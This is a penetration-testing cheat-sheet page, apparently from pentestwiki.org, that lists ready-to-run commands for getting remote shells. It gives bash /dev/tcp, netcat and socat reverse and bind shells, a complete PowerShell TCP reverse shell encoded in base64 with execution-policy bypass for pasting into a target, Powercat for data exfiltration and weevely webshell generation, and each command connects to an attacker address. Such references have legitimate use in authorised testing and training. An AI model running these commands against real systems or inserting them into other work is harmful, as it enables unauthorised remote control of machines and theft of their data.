Shells
From pentestwiki.org
Contents
Classic methods
bash
Bash reverse shell:
On attacker:
$
nc -nvv -lp 8080
On target:
$
bash -i >& /dev/tcp/$IP/8080 0>&1
netcat
- netcat bindshell
On target:
$
nc -nvvlp 8989 -e /bin/bash
On attacker:
$
nc -nvv $IP 8989
- netcat reverse shell:
On attacker:
$
nc -nvvlp 8989 $IP
On target:
$
nc -nvv $IP 8989 -e /bin/bash
- To improve the shell (Method 1) @JFaust0 :
Ctrl^Z stty raw -echo fg reset
- To improve interactive shell (Method 2):
$
python -c ‘import pty; pty.spawn("/bin/bash")’
socat
Syntax:
$
socat [options] address1 address2
Examples of address:
- -
- stdio
- tcp4:localhost:1080
- tcp4-listen:8080 = tcp-l:8080
- udp4:host:2049
- udp4-l:500
- exec:/bin/ls,pty
- socks:socks.local:$IP:80
- proxy:proxy.local:$IP:443
- ssl-l:443,cert=./server.pem
- open:file.txt
- create:newfile.txt
- UDP4-DATAGRAM:255.255.255.255:9999,bind=:9999,range=192.168.0.0/24
- TUN:192.168.1.2/24,iff-up=1
- Socat bindshell
On target:
$
socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
On attacker:
$
socat FILE:`tty`,raw,echo=0 TCP:$IP:1337
- Socat reverse shell
On attacker:
$
socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
On target:
$
socat TCP4:$IP:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
- Build a VPN with socat:
On server:
root #
socat tcp-l:50500 TUN:192.168.10.2/24,iff-up=1
On client:
root #
socat tcp:50500 TUN:192.168.10.3/24,iff-up=1
Windows Powershell
PS>
$str='$client=New-Object System.Net.Sockets.TCPClient("'+$LHOST+'",'+$LPORT+');$stream= $client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data =(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String );$sendback2=$sendback+"PS "+(pwd).Path+"> ";$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
PS>
$b=[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
PS>
echo "powershell -ep bypass -nop -encodedcommand $b" | clip
Then directly paste (Ctrl+V) in the target terminal.
USB man-in-the-middle
- proxy USB over IP
Remote:
$
socat /dev/ttyUSB0,raw,echo=0 tcp-listen:1337,reuseaddr
Local:
$
socat PTY,raw,echo=0,link=/dev/ttyVUSB0 tcp:<target>:1337
tsh
Tiny SHell is an open-source UNIX backdoor (C language)
Powershell modules
Powercat
netcat functionality with powershell. No packages required. Good for data exfiltration.
In target:
C:>
powershell -exec bypass
PS>
Import-Module .\powercat.ps1
PS>
powercat -l 80 -i input.txt -c $IP
In attacker machine:
$
nc -vvlp 80 > input.txt
Reference: https://github.com/besimorhino/powercat
Webshells
Weevely
$
python weevely.py generate AbC /var/www/html/AbC.txt